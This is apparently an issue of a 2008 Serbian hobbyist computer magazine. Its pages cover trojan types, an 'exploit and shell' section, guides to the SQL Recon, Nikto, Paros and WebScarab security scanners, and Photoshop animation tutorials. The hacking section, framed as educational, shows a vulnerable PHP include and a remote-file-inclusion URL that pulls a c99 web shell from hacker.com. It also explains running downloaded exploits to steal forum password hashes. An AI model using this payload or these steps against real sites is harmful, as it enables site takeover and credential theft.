*** 3. Trojani su programi koji vrše određene akcije bez znanja ili pristanka korisnika: krađa podataka,uništavanje ili promena podataka, prouzrokovanje problema u radu kompjutera, korišćenje žrtvinog kompjuteraza vršenje ilegalnih aktivnosti (slanje spama, izvođenje DoS napada...). Trojani se dele u sledeće grupe: 1. Backdoor trojani su alati za udaljenu administraciju koji omogućuju napadaču da upravlja inficiranimkompjuterom putem LAN-a ili Interneta. Jednom uspešno pokrenut backdoor, može da obavlja sledećefunkcije: * slanje/primanje datoteka; * otvaranje/brisanje datoteka; * pokretanje programa; * prikazivanje različitih obaveštenja; * brisanje podataka; * restartovanje kompjutera. 2. PSW trojani služe za krađu šifri (najčešće sistemskih šifri na žrtvinom kompjuteru). Oni pretražujusistemske datoteke koje sadrže poverljive informacije kao što su šifre i brojevi telefona za pristup Internetu azatim šalju te podatke na email adresu integrisanu u sam kod trojana. Pojedini PSW trojani kradu i druge tipovepodataka kao: * podatke o sistemu; * podatke o email klijentu; * IP adresu; * detalje o registraciji; * šifre za on-line igre.

Page 40: Net Majstor E-magazin Broj 3

3. Clicker trojani (pre)usmeravaju žrtvin kompjuter ka određenim Internet stranicama ili resursima. Oni ilišalju neophodne komande browseru ili menjaju sistemske datoteke gde su pohranjeni standardni url-ovi (npr.hosts datoteku). Koriste se za: * povećanje broja pregleda reklama na internet stranicama ("click fraud"); * organizovanje DoS (Denial od Service) napada na određene servere ili stranice; * navođenje žrtve ka inficiranom resursu gde kompjuter biva napadnut drugim malware-om (virusimaili trojanima). 4. Downloader trojani služe za preuzimanje (download) i instalaciju novog malware-a na žrtvinkompjuter. Downloader nakon preuzimanja ili odmah pokreće novi malware ili mu omogućuje automatskopokretanje sa sistemom. Nazivi i lokacije malware-a koji treba biti preuzet sa Interneta su ili integrisani u kodprograma ili bivaju preuzeti sa određenih stranica. 5. Dropper trojani služe za instalaciju nekog drugog malware-a na žrtvinom kompjuteru bez znanjakorisnika. Dropper trojani instaliraju svoj payload bez ikakvog obaveštenja ili prikazuju lažne poruke ogreškama. Novi malware biva kopiran na određenu lokaciju i pokrenut. U većini slučajeva, dropper-ov payloadsadrži druge trojane i bar jedan hoax (prevarU) čija je funkcija da zavara korisnika ili da prikrije aktivnostiprouzrokovane instalacijom novog malware-a. 6. Proxy trojani služe kao proxy server i obezbeđuju anoniman pristup Internetu preko žrtvinogkompjutera. Mreže ovakvih trojana se najčešće koriste u svrhu slanja spama. 7. Spy trojani predstavljaju različite špijunske programe i keylogger-e koji prate i snimaju korisničkeaktivnosti na kompromitovanim kompjuterima i šalju te podatke svome kreatoru. OVi trojani se najčešće koristeza krađu bankovnih i finansijskih informacija. 8. Notifier trojani služe da bi kreatora malware-a obavestili da je određeni kompjuter inficiran i pri tomemu šalju IP adresu, brojeve otvorenih portova, email adrese itd. Pomenuti podaci bivaju poslati putem email-a,ICQ-a ili na određenu Internet stranicu. 9. Rootkit predstavlja skup programa korišćenih od strane hacker-a za izbegavanje detekcije prilikompokušaja neovlašćenog pristupa kompjuteru. Pomenuti cilj se postiže zamenom sistemskih datoteka iliinstalacijom kernel modula. Do instalacije rootkit-a dolazi nakon obezbeđivanja standardnih korisničkihprivilegija što se postiže razbijanjem šifre ili iskorišćavanjem nekog propusta. Zatim se dobijene privilegijekoriste za prikupljanje šifri ostalih korisnika da bi se došlo do root (administratorskih) privilegija. Sam pojam potiče sa Unix sistema ali se vremenom počeo koristiti za opisivanje tehnika za skrivanjeaktivnosti malware-a na Windows sistemima. 10. ArcBombs trojani su arhivirane datoteke zamišljene za sabotažu dekompresora. Kada se pokušaizvršiti dekompresija arhive, sistem će usporiti, srušiti se ili će disk biti napunjen besmislenim podacima. Ovavrsta malware-a je posebno opasna za servere koji automatski obrađuju sve pristigle podatke. Postoje tri vrsteovih trojana: * arhive sa neispravnim zaglavljem ili podacima koje mogu prouzrokovati rušenje dekompresora priotvaranju/raspakivanju arhive; * arhive sa ponavljajućim podacima koje mogu biti upakovane izuzetno velikom kompresijom - višeGB ponavljajućih podataka može biti kompresovano na svega nekoliko KB; * arhive sa ogromnim brojem identičnih datoteka koje su nakon kompresije zanemarljive veličine uodnosu na raspakovanu arhivu.

***

4. Ostali malware uključuje: 1. programe zamišljenje za pisanje malware-a (constructors); 2. programske biblioteke posebno dizajnirane za korišćenje pri pisanju malware-a; 3. alate za enkripciju čija je funkcija sprečavanje/otežavanje detekcije od strane antivirus programa; 4. "joke" (šala) programe koji ometaju normalan rad kompjutera; 5. programe koji smišljeno dezinformišu korisnika o svojim postupcima u sistemu; 6. ostale programe koji su dizajnirani da (ne)posredno oštete lokalni ili umrežene kompjutere.

Page 41: Net Majstor E-magazin Broj 3

Mali majstori hackaOva rubrika je namenjena iskljucivo u edukativne svrhe. Svako krsenje pravila I zakona snosite sami. Net Majstornije odgovoran za postupke clanova naseg sajta I citalaca Net Majstor elektronskog magazine.

Exploit & Shell

Evo, vidim ljudi traže pojašnjenja za ova dva pojma, pa eto i ja da doprinesem ovom sajtu.

Exploiti

Klasična Web definicija: programi, najčešće pisani u perlu, koji rade na principu otkrivenih rupa na nekomsajtu.

Srpski rečeno, odete na milworm.com ili neki drugi sajt sa kog možete download-ovati exploite i nadjete onajkoji vam treba. Recimo želite da dobijete md5 hashove lozinki svih korisnika na nekom phpbb forumu, naćićete neki exploit koji koristi rupu u sistemu za logovanje ili u nekom drugom delu koda (phpbb je šupalj kaocigansko rešeto, te se rupe mogu naći bukvalno svugde :=).

Za pokretanje exploita, pisanih u perlu, potreban vam je "active perl" (google-ajte malo ;) ). Kod programasačuvajte u C:\Perl\bin

Zatim otvarate cmd i kucate

cd c:\cd perlcd binexploit.pl

naravno, "exploit.pl" menjate sa nazivom fajla u kome se nalazi kod exploita

Dalje instrukcije Vam daje sam program, dakle obavezno je poznavanje engleskog, kao za sve na Web-u.

Shell

Shell se direktno nadovezuje na rupe na sajtovima... Dakle uz odgovarajuće dozvole možete preuzeti potpunukontrolu nad sajtom.

Primer koda radnjive stranice:

<?php

include ('$stranica');

?>

Dakle, ovo je katastrofalna greška.

Page 42: Net Majstor E-magazin Broj 3

Ukoliko se ovakav kod nalazi na stranici:

http://www.mojsajt.com/proba.php

jednostavnim definisanjem varijable $stranica bićete u mogućnosti da includeujete bilo šta na sledeći način:

http://www.mojsajt.com/proba.php?stranica=http://www.hacker.com/c99.php

Autor: SETI_Explorer

SQL Recon alatBaze podataka vrlo su često jedan od najkritičnijih delova informacionog sistema budući da se unjima pohranjuju različite informacije, najčešće od velikog poslovnog značaja. Zato su baze podatakasvakako jedna od najzanimljivijih meta za potencijalne napadače, bez obzira da li se radi onapadima s javnog Interneta ili sa interne računarske mreže.Napade na baze podataka moguće je srpovoditi na različite načine, koriscenjem raznih posrednih ineposrednih metoda kao što su npr. iskorištavanje ranjivosti u operativnim sistemima na kojima supokrenute, iskoriscavanjem ranjivosti u aplikacijama koje pristupaju bazama podataka, lošimpodešavanjem prava pristupa, napadima umetanjem SQL koda (eng. SQL injection), iskoriscavanjempropusta u samim bazama i sl. Zbog svih tih mogućnosti kompromitacije te važnosti koje bazepodataka imaju, vrlo je važno voditi računa o njihovoj sigurnosti te imati potpunu kontrolu nad njima.SQL Server, odnosno SQL Desktop Edition (MSDE) su Microsoftove baze podataka koje predstavljajukonkurenciju Oracle, MySQL, PostgreSQL, DB2 i drugim bazama. U zadnjih nekoliko godina upravo suSQL Server, odnosno MSDE bili česte mete napada, a jedan od najpoznatijih incidenata svakako je onajizazvan širenjem poznatog SQL Slammer mrežnog crva koji je ugrozio veliki broj informacionihsistema na Internetu. Takođe, poznati su i brojni drugi sigurnosni propusti unutar navedenihprogramskih paketa koji su neovlascenim korisnicima omogućavali provođenje različitih malicioznihaktivnosti. Upravo je iz tog razloga mrežnim administratorima i sigurnosnim stručnjacima u Microsoftbaziranim okruženjima vrlo važno da imaju potpunu kontrolu nad svim SQL Serverima iMSDE instancama pokrenutim na računarskoj mreži.SQL Recon je besplatni alat firme SpecialOps SecurityКод:http://www.specialopssecurity.comkoji služi za aktivnu i pasivnu detekciju Microsoft SQL Server i MSDE instanci baza podataka koriscenjem svihpoznatih metoda njihove detekcije. Trenutno dostupna verzija je 1.0, a može se naci na Webstranici proizvođača.

Instalacija

Instalacija alata SQL Recon 1.0 vrlo je jednostavna. Alat je potrebno nabaviti sa pomenute lokacijeКод:http://www.specialopssecurity.com/labs/sqlrecon/1.0/down.phpa zavisno od toga da li je naciljnom računaru instaliran .NET Framework v1.1, moguće je nabaviti verziju koja funkcionise sa ilibez .NET Framework okruženja.Nastavak instalacije provodi se pokretanjem instalacijske datoteke, prihvatanjem zahteva licence iodabira direktorijuma u kojem će SQL Recon pohraniti svoje datoteke.

Page 43: Net Majstor E-magazin Broj 3

Konfiguracija

Rad s alatom i njegova konfiguracija takođe su vrlo jednostavni. GUI interfejs alata podeljen je udve kartice:– Scan i– Options.

Načini skeniranja

Kartica Scan sadrži parametre pomoću kojih je moguće odrediti opseg skeniranja (Slika 1).Moguće je odabrati dva aktivna i jedan pasivni način skeniranja.Aktivna skeniranja mogu se sprovoditi navođenjem područja IP adresa (eng. IP range), gde SQL Reconpredefinisano odabira lokalne mrežne postavke koje je moguće promeniti ručnim unosom ilikoriscenjem liste IP adresa pohranjene u tekstualnoj datoteci (eng. IP list).Zahtevni nedostatakaktivnih skeniranja jest da će takva skeniranja gotovo sigurno biti zabeležena ukoliko na mrežipostoje sistemi za detekciju neovlascenih aktivnosti (host based IDS ili network based IDS).Pasivni način skeniranja uklanja ovaj nedostatak, pa se kod SQL Recon paketa ujedno naziva i"nevidljivi" način rada (eng. stealth). Nevidljivi način rada koristi indirektne metode pronalaženjainstanci SQL Servera. Drugi deo Scan kartice služi za pregled rezultata skeniranja.

Slika 1: Podešavanje načina skeniranja i odabir IP adresa

Podešavanje parametara skeniranja

Kartica Options omogućava podešavanje parametara skeniranja. Kartica je podeljena u četiri dela:– Active Recon Options – služi za podešavanje parametara aktivnih skeniranja,– Passive Recon Options – služi za podešavanje parametara pasivnog skeniranja,– General Options – služi za podešavanje opstih parametara i opcionalno podešavanje alternativnihkorisničkih podataka.

Page 44: Net Majstor E-magazin Broj 3

Slika 2: Podešavanje parametara skeniranja

Podešavanje parametara aktivnih skeniranja podrazumeva uključivanje ili isključivanje sledećihnačina aktivnog skeniranja:

SQL Server Resolution Service Probe (UDP) –temelji se na standardnoj "SQL ping" detekciji slanjemUDP paketa na port 1434 udaljenog računara.

Registy Probe (REG) –proverava registry datoteku udaljenog računara i traži instance SQL Servera. Registryprobe zasad radi samo s predefinisanim (eng. default) verzijama SQL Servera i zahteva administrativnaovlascenja na udaljenom računaru.

WMI Enumeration Probe (WMI) – koristi WMI (eng. Windows management instrumentation) upite zadetekciju instanci SQL Servera. Pouzdani rezultati ovog načina skeniranja mogu se dobitijedino uz administrativneo ovlascenje na udaljenom računaru.

TCP Probe (TCP) – koristi standardno skeniranje TCP portova 1433 (predefinisani port za SQL Server iMSDE instance) i 2433 (predefinisani SQL Server port ukoliko je na serveru uključena "hide server"mrežna opcija).

Service Control Manager Probe (SCM) – za skeniranje koristi se Service control manager servis naudaljenom računaru. Za ovu vrstu skeniranja potrebne su korisnička ovlascenja na udaljenom računaru.

Attempt Login Probe (SA) – za razliku od ostalih vrsta skeniranja, koja detekciju SQL Servera ili MSDEinstanci sprovode isključivo na temelju odgovarajućih odgovora udaljenih računara, ova metodaskeniranja uključuje i pokušaj prijave na udaljenu instancu koriscenjem predefinisanog "SA"korisničkog računa. Ovakav način skeniranja funkcionise u slučajevima kad ostale metode ne dajuočekivane rezultate.

Podešavanje parametara pasivnog skeniranja podrazumeva sledeće opcije:

Browser Service Probe (BRO) – proverava Browser Service servis udaljenog računara. Iako ne dajedetaljne rezultate, ovo skeniranje može biti korisno za neopaženo otkrivanje instanci SQL Servera

Active Directory Probe (AD) – šalje upite Active Directory servisu i traži registrovane instance SQLServera. Pošto registracija SQl Servea unutar Active Directory-ja nije obvezna,

Page 45: Net Majstor E-magazin Broj 3

ovaj način skeniranja otkri će samo registrovane SQL Servere. Takođe, za koriscenje ovognačina skeniranja potrebne su korisnička ovlascenja na ciljnom domenu.Podešavanje opstih parametara uključuje podešavanje onih postavki koje skeniranje mogu učinitiefikasnijim:

Disable SSNetlib Version Check Parent – isključuje proveru verzije SSNEtlib.dll (intrfejs SQLServer engine-a prema protokolima nižih slojeva) biblioteke. Isključivanje ove opcije može umanjitiopasnost od generisanja upozorenja od strane IDS sistema.

Disable ICMP check – isključuje koriscenje ICMP provjera udaljenih računara. Isključivanje ove opcijepomaže kod računara koji blokiraju ICMP pakete, no može značajno usporiti rad SQL Recon alata.

Enable Debug Log – omogućava generisanje log zapisa u cilju detaljne provere odgovora koje SQLRecon program dobija prilikom skeniranja.

ICMP Timeout – omogućava podešavanje vremena koliko će SQL Recon čekati ICMP odgovor udaljenogračunara. Na brzim lokalnim mrežama s velikim brojem računara smanjivanje ove vrednosti možeubrzati rad, dok se kod sporih modemskih veza preporučuje podizanje njene vrednosti.

UDP Source Port – omogućava ručno podešavanje izvorišnog porta s kojeg će se slati paketi zaskeniranje. Na ovaj način nekad je moguće zaobići vatrozide koji filtriraju pakete (npr. podešavanjemsource porta na UDP 53).

Alternate Credentials – omogućava podešavanje alternativnih korisničkih informacija. Podešavanjetih parametara koristi se obično kod skeniranja koja zahtijevaju ovlascenja na udaljenim računarima ili naciljnoj domeni.

Rad

Nakon što je konfiguracija podešena, moguće je, pritiskom na gumb Scan, kartice Scan pokrenutiskeniranje. Zavisno od broja IP adresa koje su uključene u skeniranje, konfiguraciji mreže i ICMPpostavkama, sam proces skeniranja može trajati duzee ili kraće.Po završenom skeniranju u desnom delu prozora kartice Scan pojavit će se sve detektovane SQL Serverili MSDE instance. Odabirom bilo koje od njih moguće je pregledati detaljne informacije o detektovanojinstanci, isto kao i načine skeniranja koji su bili uspešni.

Page 46: Net Majstor E-magazin Broj 3

Slika 3: Pregled informacija od detektovane SQL Server (MSDE) instance

Dobijene rezultate moguće je pohraniti za kasniju analizu (izbornik File -> Save -> Full Report), amoguće je koriscenje i pomoći pri radu (Help), pri čemu je potrebno biti povezan na Internet,budući da Help naredba otvara Web stranicu na adresi

http://www.specialopssecurity.com/labs/sqlrecon/1.0/doc.php

Uopsteno, rad SQL Recon-a je pouzdan, a nisu uočene nikakve nestabilnosti niti problemi pri radu, štoje ponekad uobičajeno kod alata ovog tipa. Ukoliko se za detekciju SQL Server i MSDE instanci koristemetode koje ne podrazumijevaju korisnička ili administrativna ovlascenja, u nekim slučajevima je mogućeda detekcije neće biti pozitivne, no u većini slučajeva alat daje zadovoljavajuće rezultate. Malinedostatak alata jeste dosta ograničen način odabira IP adresa.

Kliknite na slike radi uvecanja i boljeg prikaza!

Alati za ispitivanje sigurnosti web-aplikacija

1. Program Nikto

Program Nikto je najpopularniji i besplatno dostupan skener web ranjivosti.

Код:http://www.cirt.net/nikto2

Nikto je PERL program osmišljen kako bi pronašao razne vrste sigurnosnih problema web servera,uključujući:

• Greške u konfiguraciji servera i programa• Izvorne datoteke i programe• Nesigurne datoteke i programe• Zastarele servere i programe

Izgrađjen je na LibWhisker biblioteci i može se pokrenuti na bilo kojoj platformi koja ima Perl runtime, apodržava SSL, posrednike (eng.Proxy), autentikaciju servera, IDS (eng. Intrusion Detection System) isl. Može biti obnovljen automatski iz dela za naredbu, s time da podržava izborno obnavljanjeažurirane verzije podataka natrag na izvornu verziju.

Bilo koji sistem koji podržava osnovne PERL instalacije može pokrenuti program Nikto. Potrebno jetestirati na:1) Windows (koristeći ActiveState Perl)2) Mac OSX3) Raznim Linux i Unix instalacijama (uključujući i RedHat, Solaris, Debian,Knoppix itd.)Trenutna verzija ovog programa je takođje distribuirana kao Windowsova izvršna datoteka za koriscenje naWin32 platformi (ne zahteva instalaciju PERL). Jedini zahtevani perl modul koji ne dolazi standardno jebiblioteka LibWhisker. Nikto dolazi konfigurisan da koristi lokalnu LW.pm datoteku (u «plugins» direktoriju),

Page 47: Net Majstor E-magazin Broj 3

ali korisnici mogu promeniti postavke.Za SSL podršku mora biti instaliran Net:: SSLeay perl modul (što opet zahteva OpenBSD naUnixWare platformama). Windows podrška za SSL zavisi od instalacijskog paketa, ali poznato je dapostoji za ActiveState Perl.Program Nikto ne pruža graficki interface korisnicima što je za većinu korisnika veliki nedostatak.

Instalacija, održavanje i korišćenje

Postupak instalacije pokreće se jednostavnim otvaranjem preuzetih datoteka (uz pretpostavkustandardne OS/perl instalacije):

Код:tar -xvf nikto-current.tar.gz tar-xvf nikto-current.tar.gzgzip -d nikto-current.tar gzip-d nikto-current.tar

Nikto može biti automatski ažuriran, uz pretpostavku da je računar na kojem je instaliranpovezivan sa Internetom, pa je potrebno samo jednostavno pokrenuti Nikto s naredbom zaažuriranje.

Код:perl nikto.pl -update perl nikto.pl-update

Osnovno skeniranje zahteva odgovor jednostavnog server preko porta 80, ako drugačije nijespecificirano. Server može biti IP adresa ili DNS naziv, a potrebno je koristiti -h (-host) opciju.Provera servera na adresi IP 192.168.0.1 na TCP portu 80 glasila bi:

Код:perl nikto.pl -h 192.168.0.1 perl nikto.pl-h 192.168.0.1

Za proveru preko drugog porta potrebno je navesti broj porta s -p (-port) opcijom npr. proveraserver na adresi IP 192.168.0.1 na TCP portu 443:

Код:perl nikto.pl -h 192.168.0.1 -p 443 perl nikto.pl-h192.168.0.1-p 443

Domaćini (serveri koji se testiraju), priključci i protokoli mogu takođe biti navedeni pomoćucelih URL sintaksi, npr:

Код:Perl nikto.pl -h https://192.168.0.1:443/ perl nikto.pl-hhttps://192.168.0.1:443/

Ako se radi o SSL serveru pomoću opcije -SSL ubrzava se test.

Код:perl nikto.pl -h 192.168.0.1 -p 443 -ssl perl nikto.pl-h192.168.0.1-p 443-SSL

Program Nikto može skenirati više priključaka navođenjem popisa priključaka u -p (-port) opciju.

Page 48: Net Majstor E-magazin Broj 3

Portovi mogu biti navedeni kao niz (tj. 80-90) ili kao lista brojeva odvojena zarezima (tj., 80,88,90).Primer ispitivanja portova 80, 88 i 443:

Код:perl nikto.pl -h 192.168.0.1 -p 80,88,443 perl nikto.pl-h192.168.0.1-p 80,88,443

Moguće je skenirti više domaćina i putem tekstualnih datoteka serverovih imena ili IP adresa.Datoteka servera mora biti formatirana tako da je zapisan jedan domaćin po retku s tim da jebroj porta naveden na kraju svakog retka. Portovi mogu biti odvojeni od drugihpriključaka preko dvotočke ili zareza.Primer ispravne datoteke :

Код:192.168.0.1:80192.168.0.2,80192.168.0.3192.168.0.1,80,443192.168.0.1:80:443localhost:8888 localhost: 8888

Test može biti izveden i ako računar na kojem je pokrenut Nikto ima samo pristup do ciljanogservera preko HTTP posrednika. Tada je potrebno postaviti proxy varijable, a zatim pokrenutiNikto s -u (-useproxy) opcijom. Sve veze koje se odvijaju preko HTTP proxy biće navedene ukonfiguracijskuoj datoteci.

Код:perl nikto.pl -h 192.168.0.1 -p 80 -u perl nikto.pl-h192.168.0.1-p 80-u

Program Nikto omogućava izlaz u tri oblika: tekstualni, CSV (eng. comma-separated values) iliHTML. Koriscenjem -o (-output) moguće je zadati izlazni format specificiran s -F (-Format). Ako seformat ne zada podrazumeva se tekstualni oblik.

Ostale opcije

Program Nikto sadrži brojne opcije koje se mogu dobiti pokretanjem programa sa opcijom -h (-help). Takođje, jedna od pogodnosti su i tehnike promene (eng. mutation) koje omogućavajukombinovanje testova ili pogađjanje vrednosti. Koriste se navođjenjem odgovarajućeg broja kojidefinise vrstu testa:

1 - Testirati sve datoteke sa svim korenskim direktorijumima2 - Pogađjanje lozinki za imena datoteka3 - nabrajanje imena korisnika putem Apache sistema4 - nabrajanje imena korisnika putem cgiwrap programa

Program Nikto takođje sadrži razne opcije prikaza:

1 - Prikaz preusmeravanja2 - Prikaz primljenih kolačića (eng. Cookies)3 - Prikaz svih 200/OK odgovora4 - Prikaz URL adresa koje zahtevaju proveru autentičnostiD - Debug OutputV - Verbose Output

Page 49: Net Majstor E-magazin Broj 3

Postoje i načini poboljšanja skeniranja koji smanjuju broj testova na ciljani računar pomoću -T (-Tuning) opcije.Postoje sljedeće –T opcije:

0 - Poslane datoteke (eng. upload)1 - Zanimljive datoteke2 - Greške u konfiguraciji / Izvorne datoteke3 - Otkrivanje informacija4 - Napadi podmetanjem (XSS / skripte / HTML)5 - Udaljeni pristup datotekama – unutar web korena6 - Denial of Service7 - Udaljeni pristup datotekama – udaljen server8 - Pokretanje naredbi9 - SQL Injectiona - Zaobilažene autentikacijeb - Identifikacija programac - Udaljeno uključivanje izvorax - Invertirane opcije poboljšanja

2. Program Paros proxy

Program Paros je alat za analiziranje sigurnosti web aplikacija napisan u programskom jeziku Java.Koristeći Paros posrednik (eng. proxy) moguće je modifikovati sve HTTP podatke izmeđju korisnika iservera, uključujući kolačiće (eng. cookies) i polja za unos.Dostupan je za Microsoft Windows, UNIX, Linux te Aplle Mac OS X operativne sisteme, a korišcenjezahteva prethodnu instalaciju JRE 1.4.x. (Java Run Time Enviroment). Korisnici Windows operativnogsistema trebaju samo pratiti uputstva za dalju instalaciju, dok korisnici UNIX (i drugih) operativnih sistematrebaju ručno otpakovati datoteke u novi direktorijum i pokrenuti .jar datoteku. Paros pruža preglednikorisnički interface kao što je prikazano na slici 3.

Slika3. Korisničko sučelje programa Paros

Osnovne funkcije

Pauk (eng. spider) ulazi u web stranice i prikuplja što je više moguće URL adresa, što omogućavabolje razumevanje hijerarhije web stranica.

Page 50: Net Majstor E-magazin Broj 3

Uključuje:• Ulazak u HTTP i HTTRS web stranice temeljene na danom URL• Podrška kolačićima• Podrška zamene posrednicima• Automatsko dodavanje URL adresa u stablo hijerarhije web stranice za potrebekasnijeg skeniranja

Ograničenja:• Nemogućnost ulaženja u SSL web stranice sa nepravilnim sertifikatom• Nemogućnost prepoznavanja nekih posebno oblikovanih URL adresa u HTMLstranicama• Nemogućnost pronalaženja URL adresa pisanih u Javascript

Funkcija skeniranja je skenirati servere temeljene na hijerarhiji web stranica, a takođje mogućeje pretraživati greške u konfiguraciji.Trenutno, program Paros ima sledeće opcije:

• Provera da li je uključena opcija PUT u direktorijumima servera• Provera da li je moguće pregledati direktorijume server• Provera da li postoje datoteke koje su zastarele• Provera za XSS• Provera da li postoje izvorne datoteke na server

Kako su sve provere temeljene na URL adresama u hijerarhiji web stranica, skener proveravasvaku adresu za svaki nedostatak.

Kao filter program Paros obavlja:

• Otkrivanje pojave prethodno definisanih obeležja u HTTP porukama, teobaveštavanje korisnika• Zapis informacija koje su zanimljive (npr. kolačići)Kako svaki filtar izvodi svaku HTTP poruku, korišcenje svih može usporiti rad browsera.

Dostupni filtri:

• LogCookie - zapis svih primljenih kolačića poslanih iz browsera do servera• LogGetQuery - zapis svih HTTP GET upita poslanih iz browsera• LogPostQuery - zapis svih HTTP POST upita poslanih iz browsera• CookieDetectFilter - obavestenje korisnika o postavljenoj opciji „Set-Cookie“ u HTTPodgovoru• IfModifiedSinceFilter - uklanjanje polja „If-Modified-Since“ i „If-None-Match“ u HTTP zahtevuOstale funkcije:

• Dekodiranje podataka u drugi oblik: Base64, SHA1 i MD5• Hvatanje HTTP zahteva i odgovora - Uključivanjem opcije „Trap Request“ u polju„Trap“ prate se svi zahtevi, dok se uključivanjem opcije „Trap Response“ prateodgovori.

Page 51: Net Majstor E-magazin Broj 3

3. Program WebScarab

WebScarab je okvir za analizu aplikacija koji komuniciraju pomoću HTTP i HTTPS protokola, napisan uprogramskom jeziku Java. U najčešćem obliku, alat WebScarab radi kao zadržavajući posrednik (eng.intercepting proxy), čime omogućava operateru pregled i izmenu zahteva kreiranih u browseru preslanja serveru te odgovora koje vraćaju server (pre primanja od stranebrowsera). Operatermože takođje pregledati i konverzacije (zahteve i odgovore) koji su prolazili kroz WebScarab.WebScarab je osmišljen kao alat za potrebe otkrivanje događjaja HTTP(S) aplikacija, bilo da omogućiprogramerima ispravljanje grešaka u problemima ili da stručnjacima za sigurnost identifikujuranjivosti.Nakon preuzimanja potrebnih datoteka instalacija se obavlja na sljedeći način:

Код:Linux: java -jar ./webscarab-selfcontained-[numbers].jarWindows: pokretanje .jar datoteke

Dostupna je verzija i za operativni system Mac OS X , a postoji i Java Web Start verzija (aplikacija kojoj sepristupa putem webinterface-a). Korisnički interface programa prikazano je na slici 4.

Slika4. Korisnički interface programa WebScarab

Osnovne funkcije

Alat WebScarab pruža brojne dodatke koje uključuju:

• Delici (eng. fragments) - izvučen HTML sadržaj HTML stranice kao da se radi s Proxy-jem• Posrednik (eng. Proxy) - prati promet izmeđju browsera i web server (HTTP ikriptovani HTTPS promet) stvarajući SSL vezu, umesto direktnog povezivanja.• Ručno presretanje - omogućuje korisniku izmenu HTTP i HTTPS zahteva i odgovora,pre nego dođju do proxz-ja ilibrowsera.• Beanshell - dozvoljava izvršavanje kompleksnih operacija na zahteve i odgovore.• Otkrivanje skrivenih polja - ponekad je lakše modifikovati skrivena polja (eng. hiddenfield) u stranici, nego zadržati zahtev nakon što je poslan. Ovaj dodatak omogućavajednostavne promene skrivenih polja u HTML stranicama u tekstualna polja čineći ihvidljivima.• Simulator širine pojasa - omogućava korisniku testiranje sporije mreže te testiranjeučitavanja web stranice (npr. pristup modemom).• Spider – identifikuje nove URL-ove na ciljnoj stranici• Ručni zahtev - uređjivanje i ponavljanje prethodnih zahteva, ili stvaranje potpunonovih.• SessionID analiza - prikuplja i analizira nekoliko kolačića• Scripted - operateri mogu koristiti BeanShell za pisanje skripte za kreiranje zahteva i

Page 52: Net Majstor E-magazin Broj 3

dostaviti je server pa skripta tada može izvesti analizu odgovora.• Parametri fuzzer – obavljaju automatsku zamenu za vrednosti parametra koji nećeproći proveru parametara (eng. parameter validation), dovodeći do ranjivosti (poputCross Site Scripting i SQL Injection).• Pretraga - omogućuje korisniku da oblikuje proizvoljni BeanShell izraz da identifikujekonverzacije koje bi trebale biti prikazane u popisu.• SOAP - dodatak koji obrađuje WSDL, te predstavlja razne funkcije i potrebneparametre koji se mogu uređjivati pre slanjaserveru.• Proširenja (eng. Extensions) – automatizuju pretrage za datoteke koje su zabunomostale u korenskom direktorijumu server.• XSS / CRLF - pretražuje korisnički kontrolisane podatke u zaglavlju i telu HTTPodgovora kako bi identifikovali potencijalne CRLF injection i reflektovane cross-sitescripting (XSS) ranjivosti.

Page 53: Net Majstor E-magazin Broj 3

Photo Shop (tutoriali)

Retro background - Autor: Kecap

Page 54: Net Majstor E-magazin Broj 3

Slika koju sam dobio posle malo bojenja layera!

Mozete josh dodati Filter > Render > Lens Flarepa podesite kako vam odgovara!Ovde sam vam postavio sliku kako izgleda kada flare uradite na layeru na kom su iscrtane linije ali mozetepokusati da stavite umesto na taj layer na background layer.

Page 55: Net Majstor E-magazin Broj 3

Animacija u PS CS3

Da biste dobili panel za animaciju idite na Windows>Animation

E ovako imate 3 osnovne stvari za animaciju u PS CS3 u opciji Tween!!!

Znaci Opacity,Postition i effects!

Idemo Redom

OpacitySluzi da vam se objekat koji vam je u Frameu postepeno pojavljuje ili nestaje!!

Npr>

Page 56: Net Majstor E-magazin Broj 3

Napisite neki Text na vasem dokumentu!!!

i dodaje novi Frame!!

!!

E sada kliknite na 1 frame i stavite text layer za nevidljiv a u 2 frameu ga ostavite da bude vidljiv!!!!Znaci Layer panel za 1 frame ce izgledati ovako:

a za 2 layer ovako :

Page 57: Net Majstor E-magazin Broj 3

Na kraju ce Animation panel izgledati ovako!>

Znaci frameovi su kao layeri dobro morate paziti na njih!Za svaki pokret nekog objekta mora imati bar 5 ili vise frameovada ne bi seckalo!Sada selektujte oba framea u Animation Panelu i pritisnite Tween!

zatim u Tween prozoru cekirajte Opacity a onstale odcekirajte i stavite 20 frameova za dodavanje!

stisnite OK!!!

Sada idite na File>Save For Web^Devices podesite kako vam odgovara ali mora biti u gifu i kliknite save!!!!!

PAZNJA: ovaj sistem cuvanja animacije je isti za svaku animaciju tako da je necu vise ponavljati!!!!

dobili smo

kliknite na sliku da biste videli animacijuPaznja: Obratite paznju na opciju u donjem levom uglu imate Once i Forever!Once stavite ako zelite da animacija samojednom animira i stane na zadnjem frameu a forever ce se stalno vrteti!U ovom primeru je stavljen ONCE~!!!!

Page 58: Net Majstor E-magazin Broj 3

PS-CS3 Animation: -=[EKG LINE]=-

(Kliknite OVDE da biste videli tutorial.)

Rezultat bi trebao da izgleda ovako, samo brze...

Naravno, ukoliko se poveca maskirano podrucje EKG ostavlja veci trag... Sve se da korigovati po potrebi...

Autor: Sergej

Page 59: Net Majstor E-magazin Broj 3

Efekat Slaganja Fotografija!

(Kliknite OVDE da biste videli tutorial.)

Page 60: Net Majstor E-magazin Broj 3

Nasi sajtovi

Re.RSVas sajt sa nama ima buducnost !

RS HOSTING je prvi domaci provajder koji pored standarnih placenih hosting planova svojimclanovima nudi i besplatan domen + hosting pod odredjenim uslovima. RS Hosting koristinajsavremenije hosting tehnologije radi sigurnosti vasih projekata. Korisnici usluga RS Hostingaimaju uvid u status svojih naloga putem Klijent Panela (cPanel-a).Svaki nalog moze koristitibrojne opcije ponudjene u cPanelu.Podrzane su sve php,perl,cgi skripte koristeci MySql base zarad istih.Sajt je u izradi i ocekujemo otvaranja vrata novim clanovima do kraja meseca.

S postovanjem RS HOSTING Tim !

Copyright © 2008 Net Majstor – All right reserved.